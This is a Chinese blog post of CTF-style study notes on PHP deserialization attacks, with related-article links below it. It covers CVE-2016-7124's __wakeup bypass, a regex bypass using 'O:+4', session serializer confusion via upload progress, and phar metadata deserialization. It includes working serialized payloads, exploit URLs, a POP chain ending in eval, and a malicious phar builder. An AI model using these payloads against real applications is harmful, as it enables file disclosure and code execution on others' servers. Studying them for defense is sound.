PHP反序列化笔记

最新推荐文章于 2024-04-28 18:08:34 发布
最新推荐文章于 2024-04-28 18:08:34 发布
阅读量4k 收藏 12
点赞数 1
分类专栏: 反序列漏洞 WEB安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nzjdsds/article/details/104011576
版权

目录

文章目录

private变量与protected变量序列化后的特点

\x00 + 类名 + \x00 + 变量名 -> 反序列化为private变量

\x00 + * + \x00 + 变量名 -> 反序列化为protected变量

<?php
highlight_file(__FILE__);
class user{
    private $name2 = 'leo';
    protected $age2 = 19;
    
    public function print_data(){
        echo $this->name2 . ' is ' . $this->age2 . ' years old <br>';
    }
}

$user = new user();
$user->print_data();
echo serialize($user);

?> leo is 19 years old
O:4:"user":2:{s:11:"username2";s:3:"leo";s:7:"*age2";i:19;}

序列化后的字段长度前面可以加 +

题目

<?php  
@error_reporting(1); 
class baby 
{   
    public $file;
    function __toString()      
    {          
        if(isset($this->file)) 
        {
            $filename = "./{$this->file}";        
            if (file_get_contents($filename))         
            {              
                return file_get_contents($filename); 
            } 
        }     
    }  
}  
if (isset($_GET['data']))  
{ 
    $data = $_GET['data'];
    preg_match('/[oc]:\d+:/i',$data,$matches); // 这里匹配到O后面跟着数字就拦截
    if(count($matches))
    {
        die('Hacker!');
    }
    else
    {
        $good = unserialize($data);
        echo $good;
    }     
} 
else 
{ 
    highlight_file("./index.php"); 
} 
?>

解题步骤

  1. 构造序列化对象
<?php
// highlight_file(__FILE__);
class baby 
{   
    public $file;
    function __toString()      
    {          
        if(isset($this->file)) 
        {
            $filename = "./{$this->file}";        
            if (file_get_contents($filename))         
            {              
                return file_get_contents($filename); 
            } 
        }     
    }  
}  

$baby = new baby();
$baby->file = 'flag.php';
echo serialize($baby);

?>

得到如下内容:
O:4:"baby":1:{s:4:"file";s:8:"flag.php";}
  1. 重构对象
O:+4:"baby":1:{s:4:"file";s:8:"flag.php";}
  1. url编码
O:%2b4:"baby":1:{s:4:"file";s:8:"flag.php";}
  1. 访问
http://127.0.0.1/ctf.php?data=O:%2b4:"baby":1:{s:4:"file";s:8:"flag.php";}

CVE-2016-7124

漏洞介绍

当序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行

演示代码

<?php
highlight_file(__FILE__);
class test{
    var $bull;
    public function __destruct(){
        $this->bull = "destruct<br/>";
        echo $this->bull;
        echo "destruct ok!<br/>";
    }
    public function __wakeup(){
        $this->bull = "wake up<br/>";
        echo $this->bull;
        echo "wake up ok!<br/>";
    }

}
// 正常payload
// $payload = O:4:"test":1:{s:4:"bull";s:4:"sdfz";}
// 触发漏洞的payload
$payload = 'O:4:"test":2:{s:4:"bull";s:4:"sdfz";}';
$abc = unserialize($payload);


?>

题目

<?php
  class SoFun{ 
    protected $file='index.php';
    public function __construct($file){
        $this->file = $file;

    }
    function __destruct(){
        if(!empty($this->file)) 
        {
            //查找file文件中的字符串,如果有'\\'和'/'在字符串中,就显示错误
            if(strchr($this->file,"\\")===false &&  strchr($this->file, '/')===false)
            {
                show_source(dirname (__FILE__).'/'.$this ->file);
            }
            else{
                    die('Wrong filename.');
                }
        }
    }
    function __wakeup()
    { 
        $this-> file='index.php';
    } 
    public function __toString()
    {
        return '';
    }
}     
    if (!isset($_GET['file']))
    { 
        show_source('index.php'); 
    } 
    else{ 
       $file=base64_decode( $_GET['file']); 
       echo unserialize($file); 
    } 
?>

解题步骤

  1. 获得反序列化对象
<?php
  class SoFun{ 
    protected $file='index.php';
    public function __construct($file){
        $this->file = $file;

    }
    function __destruct(){
        if(!empty($this->file)) 
        {
            //查找file文件中的字符串,如果有'\\'和'/'在字符串中,就显示错误
            if(strchr($this->file,"\\")===false &&  strchr($this->file, '/')===false)
            {
                show_source(dirname (__FILE__).'/'.$this ->file);
            }
            else{
                    die('Wrong filename.');
                }
        }
    }
    function __wakeup()
    { 
        $this-> file='index.php';
    } 
    public function __toString()
    {
        return '';
    }
}     
    if (!isset($_GET['file']))
    { 
        //show_source('index.php'); 
    } 
    else{ 
       $file=base64_decode( $_GET['file']); 
       echo unserialize($file); 
    } 

$test = new SoFun('flag.php');

echo base64_encode(serialize($test));

结果:
Tzo1OiJTb0Z1biI6MTp7czo3OiIAKgBmaWxlIjtzOjg6ImZsYWcucGhwIjt9
?>
  1. 利用漏洞
# 把变量数量更改为大于实际的变量数量并重新用base64编码
Tzo1OiJTb0Z1biI6Mjp7czo3OiIAKgBmaWxlIjtzOjg6ImZsYWcucGhwIjt9
  1. 访问URL
http://127.0.0.1/test.php?file=Tzo1OiJTb0Z1biI6Mjp7czo3OiIAKgBmaWxlIjtzOjg6ImZsYWcucGhwIjt9

PHP Session 反序列化

PHP的3种序列化处理器

PHP 内置了多种处理器用于存取$_SESSION数据时会对数据进行序列化和反序列化,常用的有以下三种,对应三种不同的处理格式

处理器对应的存储格式
php键名 + 竖线 + 经过 serialize() 函数序列化处理的值
php_binary键名的长度对应的 ASCII 字符 + 键名 + 经过 serialize() 函数序列化处理的值
php_serialize(php>=5.5.4)经过 serialize() 函数序列化处理的数组

安全问题

当 session.auto_start=Off 时

当PHP序列化使用的是php_serialize,反序列化使用的是php的时候就会出现安全问题

此时注入的数据是a=|O:4:“test”:0:{}
那么通过php_serialize反序列化储存的结果就是a:1:{s:1:“a”;s:16:"|O:4:“test”:0:{}";}
根据php的反序列化格式( 键名 + 竖线 + 经过 serialize() 函数反序列处理的值 ),此时a:1:{s:1:“a”;s:16:" 就会被当作键名, O:4:“test”:0:{}"; 就会被当作序列化后的值

测试Demo

1.php

<?php
ini_set("session.serialize_handler", 'php_serialize');
session_start();
$_SESSION['a'] = $_GET['a'];
?>

2.php

<?php
ini_set("session.serialize_handler", 'php');
session_start();
class peiqi{
    public $meat = '123';
    function __wakeup(){
        echo "I AM Peiqi";
    }
    function __destruct(){
        echo $this->meat;
    }
}
?>

先对2.php的peiqi类进行序列化

<?php
class peiqi{
    public $meat = '123';
    function __wakeup(){
        echo "I AM Peiqi";
    }
    function __destruct(){
        echo $this->meat;
    }
}

$a = new peiqi();
$a->meat = '3333';
echo serialize($a);
// 输出结果O:5:"peiqi":1:{s:4:"meat";s:4:"3333";}
?>

通过1.php文件 把序列化后的内容写入到session 主要前面要加|

http://localhost/test/1.php?a=|O:5:"peiqi":1:{s:4:"meat";s:4:"3333";}

然后访问2.php 触发php处理器进行反序列化session文件

在这里插入图片描述
此时session文件里面的内容
在这里插入图片描述

题目

index.php

<?php
    ini_set('session.serialize_handler', 'php');
    //服务器反序列化使用的处理器是php_serialize,而这里使用了php,所以会出现安全问题
    require("./class.php");
    session_start();

    $obj = new foo1();
    $obj->varr = "phpinfo.php";
?>

phpinfo.php

<?php
    session_start();
    require("./class.php");

    $f3 = new foo3();
    $f3->varr = "phpinfo();";
    $f3->execute();
?>

在这里插入图片描述
这里为了方便实验把session.upload_progress.cleanup 变成off

class.php

<?php

highlight_string(file_get_contents(basename($_SERVER['PHP_SELF'])));
//show_source(__FILE__);

class foo1{
    public $varr;
    function __construct(){
        $this->varr = "index.php";
    }
    function __destruct(){
        if(file_exists($this->varr)){
            echo "<br>文件".$this->varr."存在<br>";
        }
        echo "<br>这是foo1的析构函数<br>";
    }
}

class foo2{
    public $varr;
    public $obj;
    function __construct(){
        $this->varr = '1234567890';
        $this->obj = null;
    }
    function __toString(){
        $this->obj->execute();
        return $this->varr;
    }
    function __desctuct(){
        echo "<br>这是foo2的析构函数<br>";
    }
}

class foo3{
    public $varr;
    function execute(){
        eval($this->varr);
    }
    function __desctuct(){
        echo "<br>这是foo3的析构函数<br>";
    }
}

?>

解题步骤

通过上面的学习,我们明白需要通过php_serialize来序列化,通过php来进行反序列化。

所以我们通过phpinfo.php来序列化,通过index.php来反序列化

但是我们如何往session里面写入内容呢?

当session.upload_progress.enabled开启时,PHP能够在每一个文件上传时监测上传进度。

当POST中有一个变量与php.ini中的session.upload_progress.name变量值相同时,上传进度就会写入到session中
在这里插入图片描述

写入到session的数据内容为:session.upload_progress.prefix与 session.upload_progress.name连接在一起的值
在这里插入图片描述

链接:https://bugs.php.net/bug.php?id=71101

<form action="http://127.0.0.1/test/phpinfo.php" method="POST" enctype="multipart/form-data">
	<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="ryat" />
	<input type="file" name="file" />
	<input type="submit" />
</form>

这样我们就可以控制session里面的内容了

这样利用漏洞的2个条件都有了

我们在看下3个php代码之间的关系

  1. php.php -> 用来写入序列化内容
  2. index.php -> 用来进行反序列化
  3. class.php -> 用来被触发执行恶意代码

我们在仔细看下class.php的代码

在这之前我们先介绍下,PHP的常用魔术方法

  1. __wakeup:unserialize( )会检查是否存在一个_wakeup( ) 方法。如果存在,则会先调用_wakeup 方法,预先准备对象需要的资源
  2. __construct:具有构造函数的类会在每次创建新对象时先调用此方法。
  3. __destruct:析构函数会在到某个对象的所有引用都被删除或者当对象被显式销毁时执行。
  4. __toString:_toString( ) 方法用于一个类被当成字符串时应怎样回应。

在class.php的foo3类中我们看到

function execute(){
        eval($this->varr);
    }

所以我们需要给varr赋值,来执行语句

在foo2中我们看到

function __toString(){
        $this->obj->execute();
        return $this->varr;
    }

所以我们需要把obj实例化成foo3对象,并且这个是__tosgtring()的魔术方法

在foo1中我们看到

function __destruct(){
        if(file_exists($this->varr)){
            echo "<br>文件".$this->varr."存在<br>";
        }
        echo "<br>这是foo1的析构函数<br>";
    }

所以我们需要把varr实例化成foo2,来调用__tostring的魔术方法

  1. 我们先构造序列化内容
<?php

highlight_string(file_get_contents(basename($_SERVER['PHP_SELF'])));
//show_source(__FILE__);

class foo1{
    public $varr;
    function __construct(){
        $this->varr = "index.php";
    }
    function __destruct(){
        if(file_exists($this->varr)){
            echo "<br>文件".$this->varr."存在<br>";
        }
        echo "<br>这是foo1的析构函数<br>";
    }
}

class foo2{
    public $varr;
    public $obj;
    function __construct(){
        $this->varr = '1234567890';
        $this->obj = null;
    }
    function __toString(){
        $this->obj->execute();
        return $this->varr;
    }
    function __desctuct(){
        echo "<br>这是foo2的析构函数<br>";
    }
}

class foo3{
    public $varr;
    function execute(){
        eval($this->varr);
    }
    function __desctuct(){
        echo "<br>这是foo3的析构函数<br>";
    }
}

$a = new foo1();
$b= new foo2();
$c = new foo3();
$a->varr = $b;
$b->obj = $c;
$c->varr = "echo 'dfz';";


echo serialize($a);
// 输出结果:O:4:"foo1":1:{s:4:"varr";O:4:"foo2":2:{s:4:"varr";s:10:"1234567890";s:3:"obj";O:4:"foo3":1:{s:4:"varr";s:11:"echo 'dfz';";}}}

?>
  1. 通过html页面,写入到session,同时序列化内容前要加上 |

在这里插入图片描述

  1. 访问index.php

在这里插入图片描述

phar反序列化

https://blog.ripstech.com/2018/new-php-exploitation-technique/

利用phar函数可以在不适用unserialize()函数的情况下触发PHP反序列化漏洞

漏洞点在使用phar://协议读取文件时,文件内容会被解析成phar对象,然后phar对象内的Meta data信息会被反序列化

通过一下代码创建一个phar文件

<?php
// create new Phar
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
$phar->setStub('<?php __HALT_COMPILER(); ? >');

// add object of any class as meta data
class AnyClass {}
$object = new AnyClass;
$object->data = 'rips';
$phar->setMetadata($object);
$phar->stopBuffering();
?>

若出现下面这样的提示

Fatal error: Uncaught exception 'UnexpectedValueException' with message 'creating archive "test.phar" disabled by the php.ini setting phar.readonly' in D:\phpstudy\PHPTutorial\WWW\test\phar.php:3 Stack trace: #0 D:\phpstudy\PHPTutorial\WWW\test\phar.php(3): Phar->__construct('test.phar') #1 {main} thrown in D:\phpstudy\PHPTutorial\WWW\test\phar.php on line 3

把php.ini中的phar.readonly 改为 Off重启即可

在这里插入图片描述

phar文件的二进制内容如下

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-o0wD256y-1579182366114)(F25E15F8D906448EAA764377830317A1)]

这个时候我们创建另一个php

<?php
class AnyClass {
	function __destruct() {
		echo $this->data;
	}
}
// output: rips
include('phar://test.phar');
?>

访问就可以看到网页输出rips

在这里插入图片描述

除了include还可以使用下列函数

include('phar://test.phar');
var_dump(file_exists('phar://test.phar'));
var_dump(file_get_contents('phar://test.phar'));
var_dump(file('phar://test.phar'));
# 改了文件名同样有效果
var_dump(file_get_contents('phar://test.jpg'));
var_dump(file_exists('phar://test.jpg'));
var_dump(file('phar://test.jpg'));
include('phar://test.jpg');

// 网站上的代码,同样可以
file_exists($_GET['file']);
md5_file($_GET['file']);
filemtime($_GET['file']);
filesize($_GET['file']);

md5_file($_GET[‘file’]);演示:

在这里插入图片描述

这样我们利用phar来执行任意代码

<?php
// create new Phar
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
$phar->setStub('<?php __HALT_COMPILER(); ? >');

// add object of any class as meta data
class AnyClass {}
$object = new AnyClass;
$object->data = 'rips';
$object->data1 = 'phpinfo();';
$phar->setMetadata($object);
$phar->stopBuffering();
?>

<?php
class AnyClass {
   function __destruct() {
       echo $this->data;
       eval($this->data1);
   }
}
// output: rips
md5_file($_GET['file']);
?>

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-z10zqMEY-1579182366120)(BA82AE34F2D7412BBAB83351808E9356)]

大方子
关注
  • 1
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
php序列漏洞 实例_浅析PHP序列漏洞的利用与审计
weixin_42510783的博客
03-09 376
0x00 前言首发在社区:Secin序列漏洞其实很多人都讲过了,正巧最近在某坛子上看到篇审计讲一个典型的PHP序列漏洞点,那么我就重新回顾下,主要是学习思路和个人理解,如果误区请指出,笔者感谢。0x01 PHP序列序列介绍PHP提供了两个对象序列序列的方法,分别是serialize()和unserialize()。从意义上理解,serialize()序列的作用是产生一个可...
php json与xml序列/序列
12-19
在web开发中对象的序列序列经常使用,比较主流的有json格式与xml格式的序列序列,今天想写个jsop的小demo,结果发现不会使用php序列,查了一下资料,做个笔记简单数组json格式序列/序列 ...
php.ini 只读,disabled by the php.ini setting phar.readonly
weixin_35835030的博客
03-25 1487
1,最近看了一下phar模块,就是php自己的打包打包结果和java的jar类似但是我就简单执行一行 new Phar('my-demo.phar');报错啦:报错信息:Uncaught exception 'UnexpectedValueException' with message 'creating archive "my-demo.phar" disabled by the php.in...
配环境小记之phar.readonly=Off坑
m0_73728268的博客
10-10 582
phpstorm下解决phar文件无法生成问题
php序列以及相关例题
最新发布
2401_82388450的博客
04-28 1064
1.序列就是将 对象object、字符串string、数组array、变量 转换成具有一定格式的字符串,方便保持稳定的格式在文件中传输,以便还原为原来的内容。简单来说就是将内存变成文件,在程序执行结束时,内存数据便会立即销毁,变量所储存的数据便是内存数据,而文件、数据库是“持久数据”,因此PHP序列就是将内存的变量数据“保存”到文件中的持久数据的过程。2.序列就是在适当的时候把这个字符串再转成原来的变量使用。
phar序列学习
qq_53755216的博客
06-09 1332
phar序列 什么是phar文件 phar文件本质上是一种压缩文件,会以序列的形式存储用户自定义的meta-data。当受影响的文件操作函数调用phar文件时,会自动序列meta-data内的内容。 PHAR (“Php ARchive”) 是PHP里类似于JAR的一种打包文件。如果你使用的是 PHP 5.3 或更高版本,那么Phar后缀文件是默认开启支持的,你不需要任何其他的安装就可以使用它。 在软件中,PHAR(PHP归档)文件是一种打包格式,通过将许多PHP代码文件和其他资源(例如
serializer:用于对任何复杂度的数据进行(序列的库(支持JSON和XML)
04-13
jms /序列器介绍该库允许您对任何复杂的数据进行(序列。 当前,它支持XML和JSON。 它还为您提供了丰富的工具集,可根据您的特定需求调整输出。 内置功能包括: 对任何复杂度的数据进行(序列); 循环...
Edifact:一个PHP库,提供了一个框架来解析,构建,序列和验证UNEDIFACT消息
04-09
一个PHP库提供了一个框架来解析,构建,序列和验证UN / EDIFACT消息。 强调 以内存高效且可扩展的方式解析和写入文件 将每个Segment解析为其特定的Object,这样我们就可以定义getter,setter并对其进行验证 将每...
【基础篇】第10篇:PHP代码审计笔记--序列漏洞1
08-03
0x01 序列简单利用serialize() 序列:使用函数serialize()可将实例序列为字符串 unserialize() 序列:使用函数un
day21笔记1
08-08
- 注意,对于对象类型的Session数据,当从Session中取出时,需要确保PHP能找到对象对应的类,因为序列后的数据只包含对象的属性,不包含类的信息。 2. **开启Session** - 每次使用Session前,必须先开启它。PHP...
php phar 无法创建,composer.phar 安装出现PHP Fatal error解决办法
weixin_35526110的博客
03-18 821
报错:PHP Fatal error: Uncaught exception 'PharException' with message 'phar "C:\ProgramData\ComposerSetup\bin\composer.phar" has a broken signature' in C:\ProgramData\ComposerSetup\bin\composer.phar:23...
php序列
n1ght的博客
11-30 735
php序列,和php的session序列php原生类
php序列学习及简单的序列漏洞介绍
L1ni01
10-13 447
php序列学习经历 1.为什么会有序列序列 我们在开发的过程中常常遇到需要把对象或者数组进行序列号存储,序列输出的情况。特别是当需要把数组存储到mysql数据库中时,我们时常需要将数组进行序列号操作。 序列(串行):是将变量转换为可保存或传输的字符串的过程; 序列串行):就是在适当的时候把这个字符串再转成原来的变量使用。 这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性。 2.相关函数 serialize是序列函数 先看看数组的序列 <?php $x
disabled by the php.ini setting phar.readonly
weixin_34004750的博客
09-18 2968
2019独角兽企业重金招聘Python工程师标准>>> ...
php server.php无法链接,运行php server.php 后,8888端口可连接,但无数据返回
weixin_33367083的博客
03-19 174
请更新一下swoole扩展的代码,重新编译安装一下。------------------ 原始邮件 ------------------发件人: "roger.luo"notifications@github.com;发送时间: 2013年8月15日(星期四) 下午5:03收件人: "matyhtf/swoole_framework"swoole_framework@noreply.github....
从一道CTF题学习PHP序列漏洞
Fly_鹏程万里
09-17 6277
一、CTF题目 前阵子,参加了一个CTF比赛,其中有一条道题蛮有意思的,所以写出来分享一下。 此题利用了PHP序列漏洞,通过构造特殊的Payload绕过__wakeup()魔术方法,从而实现注入目的,废话不多说,主要源码如下: class SoFun{ protected $file='index.php'; function __destruct(){ ...
长亭php序列防护_PHP序列笔记
06-01
好的,您的问题是关于长亭PHP序列防护和PHP序列笔记。 首先,PHP序列是指将序列的数据转换回PHP对象或数组的过程。这个过程在应用程序中非常常见,但也很容易被黑客利用来执行恶意代码。因此,PHP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值